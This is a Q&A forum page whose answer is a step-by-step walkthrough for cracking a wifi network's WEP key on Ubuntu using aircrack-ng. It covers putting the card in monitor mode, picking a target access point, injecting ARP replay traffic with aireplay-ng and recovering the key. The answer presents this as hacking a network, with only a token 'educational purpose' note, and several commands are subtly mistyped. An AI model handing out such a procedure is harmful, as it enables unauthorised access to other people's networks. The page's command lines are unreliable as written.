How to find password of a wifi using ubuntu 18 06

0 votes
Apr 24, 2020 in Cyber Security & Ethical Hacking by Ramesh
• 120 points
39,093 views

1 answer to this question.

+3 votes

To hack a wifi password using ubuntu:

  • You will need to install a program called aircrack to be installed on your OS.

sudo apt-get install aircrack-ng
  • You need to go in root first. For this purpose type “su –“ and type your password.

  • Now Type Following Command In Terminal Code:

       # iwconfig wlan0 mode monitoring

Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

  • After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:

# airodump-ng wlan0
  • Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.

 # airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0
  • Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.

# aireplay-ng -3 –b 00:15:EB:E7: … wlan0
  • Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20000 packets. If so abort both airodump-ng and aireplay-ng. Now we have everything required to decode the key of the wireless network. We do that with aircrack 

# aircrack-ng wep-03.cap

Then you should see that the key has been decrypted 100% successfully and the key itself.

Note: Its For Educational Purpose Only.

Hope this helps!

To know more, join our Cybersecurity Training in NYC today.

answered Apr 24, 2020 by Kim

edited Oct 6, 2021 by Sarfaraz

Related Questions In Cyber Security & Ethical Hacking

0 votes
1 answer

Is it possible to find technolgy name of a web application using session tokens?

If the web application uses web servers that ...READ MORE

answered Aug 22, 2019 in Cyber Security & Ethical Hacking by Kumar

edited Oct 7, 2021 by Sarfaraz 564 views
+1 vote
1 answer

How to find IP address of nodes in my network?

The IP address of the nodes connected ...READ MORE

answered Feb 9, 2019 in Cyber Security & Ethical Hacking by Omkar
• 69,210 points
4,228 views
0 votes
1 answer

How to find MAC address using IP address?

To find the MAC address, run this ...READ MORE

answered Feb 9, 2019 in Cyber Security & Ethical Hacking by Omkar
• 69,210 points
2,006 views
0 votes
2 answers

How to manage network using a router?

Security and data logging.. Simple READ MORE

answered Dec 20, 2020 in Cyber Security & Ethical Hacking by Pavan Billore
2,537 views
0 votes
1 answer

How to diagnose a network using loopback address?

C:\Users\priyj_kumar>ping Loopback Pinging DESKTOP-TGAB9Q5 [::1] with 32 bytes ...READ MORE

answered Mar 22, 2019 in Cyber Security & Ethical Hacking by Priyaj
• 58,090 points
1,320 views
0 votes
1 answer
0 votes
1 answer
0 votes
1 answer
+1 vote
2 answers
+3 votes
3 answers
webinar REGISTER FOR FREE WEBINAR X
REGISTER NOW
webinar_success Thank you for registering Join Edureka Meetup community for 100+ Free Webinars each month JOIN MEETUP GROUP